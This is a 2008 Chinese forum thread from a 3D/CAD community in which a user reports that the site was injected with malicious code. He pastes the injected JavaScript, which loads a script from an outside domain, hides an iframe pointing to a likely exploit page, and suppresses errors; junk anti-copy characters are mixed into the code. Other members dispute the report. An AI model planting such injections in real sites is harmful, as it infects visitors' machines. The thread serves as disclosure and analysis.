此网被挂马

czy12 · 发表于 2008-11-26 14:38:57

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

您需要登录才可以下载或查看，没有帐号？注册

x

马:Hack.Exploit.Script.JS.Mixed.c

<script language="javascript" SRC=" ' target=_blank>http://u.cruze3.cn/u.js"></script>
8 v9 ?0 ^+ P. I, G$ @
1 s" D% [ j5 d8 H
document.writeln("<script>";
7 V% h [0 _$ N! A- z, ]. @" z) D
document.writeln("function oK_Begin(){";
' `! {' V) h' \, E- ]) }- y
document.writeln("var Then = new Date() ";) ~" ^2 a) a* G i9 G
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
! P$ V8 M( n1 H4 O) v& P, ?
document.writeln("var cookieString = new String(document.cookie)";
document.writeln("var cookieHeader = "Cookie1=" ";
; a+ i# ?7 c* e4 y% I% p/ ?
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
2 _# ?' |7 d; @7 }, @
document.writeln("if (beginPosition != -1){ ";
$ x2 d" Q7 z& N3 K7 A: e
document.writeln("} else ";1 z' C3 }7 L6 F; O4 ]% P
document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";6 t9 r0 O! e5 F9 s, Q. H
document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";' q7 Y- v$ j& R, A; W7 y
document.writeln("}";
: N, T; T$ w0 V' M! O# W4 ]
document.writeln("}";
9 n. e7 w) T" A
document.writeln("oK_Begin();";. s+ ~, X8 I( o+ i, M" B: ]
document.writeln("<\/script>";
3 l2 l" S% a9 ^2 J# E
document.writeln("<script>window.onerror=function(){return true;}<\/script>"
4 N: F$ I% L+ ~
- @( l% @) L4 _" Q: {
! e" W% y3 _" W6 B6 U
2 X+ p6 _. Y# j$ P V6 k% l$ r( x
! Y, w. M/ o; [" a' U M
$ B% p5 X* s+ {6 \; ]

复制代码

虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马

19720205 · 发表于 2008-11-26 14:44:03

请管理员确认是否网页挂马?

cayuer · 发表于 2008-11-26 14:47:52

我的麦咖啡都没检测出来你什么杀毒软件？

czy12 · 发表于 2008-11-26 16:16:23

不是杀软件查的.
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
不过,已经被清理了.

HEHE只是没有礼貌

[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]

江南有雪 · 发表于 2008-11-26 18:27:17

你这个什么网站，哪里出来的？

ht tp://u.cruze3.cn/u.js

czy12 · 发表于 2008-11-27 09:15:28

http://u.cruze3.cn/u.js
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
HEHE

wwqq · 发表于 2008-11-27 10:26:38

这跟三维有什么关系？

czy12 · 发表于 2008-11-27 11:01:02

这是挂在三维网论坛里的.
红线所指

huang_baker · 发表于 2008-11-27 11:21:19

奇怪，为什么我的里面没有？是不是楼主的机器自己带病毒了？

小雪 · 发表于 2008-11-27 11:26:10

自己的机子中毒了，就不要满天喊叫了，没人会认为你是一个杀毒的行家

czy12 · 发表于 2008-11-27 11:34:27

不学无术.
HEHE

yyywwwhk · 发表于 2008-11-27 14:30:45

但在:
http://www.3dportal.cn/discuz/ 之原始檔
似乎看不见楼主所说的 http://u.cruze3.cn/u.js

[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]

新洁电子 · 发表于 2008-11-27 15:30:58

经过自编扫描代码处理结果，未发现楼主说的挂马代码！

请清理自己计算机的缓冲区！

hebei · 发表于 2008-11-27 15:43:48

提示: 作者被禁止或删除内容自动屏蔽

college · 发表于 2008-11-27 15:47:42

看您的尾符/script，很像是U盘病毒。

czy12 · 发表于 2008-11-27 15:50:50

DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
我也说了：已修复。

ps:这与缓存毫无关系。虽然缓存中有U.JS.
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?

script是个JAVA代码,与U盘何关?

HEHE

[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]

新洁电子 · 发表于 2008-11-27 16:11:40

非也，代码是程序直接采样的当时的网页代码，是自编的，算不上权威，但是可以直接进入部分加密网站！

如果却如你说的修改了，我想，这只有论坛管理员有这个权限，即便是后台也是有记录的。假如确实是论坛后台修改了，一定会给大伙一个说法的。

相反，目前从各方面提供的代码显示，确实“此时此刻”是正常的！至于继续讨论已经无大的价值！

		自动登录	找回密码
密码			注册

通知

此网被挂马

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

回复 3# cayuer 的帖子

回复 5# 江南有雪的帖子

回复 6# czy12 的帖子

回复 8# czy12 的帖子

浏览过的版块

hebei hebei 当前离线积分 2978 UID 494886 主题在线时间小时注册时间 2008-3-22 头像被屏蔽	发表于 2008-11-27 15:43:48 \| 显示全部楼层来自：中国河北衡水提示: 作者被禁止或删除内容自动屏蔽

	回复支持反对举报

通知

此网被挂马

马上注册，结识高手，享用更多资源，轻松玩转三维网社区。

回复 3# cayuer 的帖子

回复 5# 江南有雪 的帖子

回复 6# czy12 的帖子

回复 8# czy12 的帖子

浏览过的版块

回复 5# 江南有雪的帖子